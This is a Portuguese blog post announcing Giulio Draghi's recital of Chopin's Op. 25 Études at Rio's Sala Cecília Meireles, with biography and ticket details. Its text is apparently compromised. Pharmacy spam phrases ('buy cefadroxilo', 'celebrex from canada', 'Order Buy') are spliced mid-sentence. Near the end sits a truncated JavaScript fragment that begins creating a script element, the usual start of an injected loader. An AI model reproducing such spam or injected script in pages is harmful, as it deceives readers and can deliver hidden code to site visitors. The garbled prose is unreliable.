Música de câmaraProgramaçãoRio de Janeiro

Um Chopin após o trabalho

Pianista Giulio Draghi apresenta obras de Chopin em horários alternativos na Sala Cecília Meireles.

 

A Sala Cecília Meireles, no Rio de Janeiro, destina uma programação voltada a quem trabalha no Centro da cidade, com concertos às 12h30 e 18h30 – criados especialmente para quem tem uma folguinha no horário do almoço ou quer aproveitar a saída do expediente com um programa cultural enquanto espera o trânsito diminuir. O próximo recital da série é com o pianista Giulio Draghi online Order , que apresenta, no dia 28 de janeiro, quarta-feira, a segunda parte dos Order Buy 24 Estudos (Op. 25), de F. Chopin. O concerto integra a série Recitais de Guiomar, no Espaço Guiomar Novaes. Os ingressos custam R$ 10.

Considerados o fundamento de um novo sistema técnico de tocar piano, os estudos de Chopin trazem algumas das peças mais desafiadoras e evocativas de todo o repertório de concerto para o instrumento. O conjunto Op. 25 (com 12 estudos) foi publicado em 1837 e complementa o Op. 10, publicado em 1833. A primeira parte foi apresentada pelo pianista Draghi na série Recitais de Guiomar buy cefadroxilo no dia 21 de janeiro.

Giulio Draghi é pianista e professor adjunto de piano na Escola de Música da UFRJ. Recebeu seu título de Cheap Doctor in Musical Arts da Universidade de Miami, em 2007, graduando-se com honras, o que lhe valeu a nomeação para a mais antiga sociedade musical americana: The Society of PiKappa Lambda. Giulio obteve diversos primeiros lugares em concursos nacionais, destacando-se o Concurso Nacional Centenário Essenfelder. Como solista já se apresentou com orquestras como a OSB, Petrobras, Sinfônicas de Brasília, Salvador, Porto Alegre, Paraná, Belo Horizonte e Espírito Santo. Também tem se apresentado regularmente como concertista nos Estados Unidos e Canadá.

Foto de Paulo Gois

 

SERVIÇO:

24 Estudos (Op. 25), de F. Chopin

celebrex from canada Giulio Draghi, piano

 

28 de janeiro, quarta-feira

Sala Cecília Meireles (Largo da Lapa, 47, Centro – Rio de Janeiro. Tel.: 2332-9223)

 

Ingressos a R$ 10, com 50% de desconto para estudantes e idosos. À venda na bilheteria da Sala ou no site Ingresso.com

Horário da bilheteria: segunda a sexta – das 12h às 18h ou até início do concerto; sábado – quando houver concerto, das 12h até o início da apresentação.

680 lugares

http://salaceciliameireles.rj.gov.br

var d=document;var s=d.createElement(‘script’); Order

Leave a Response

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.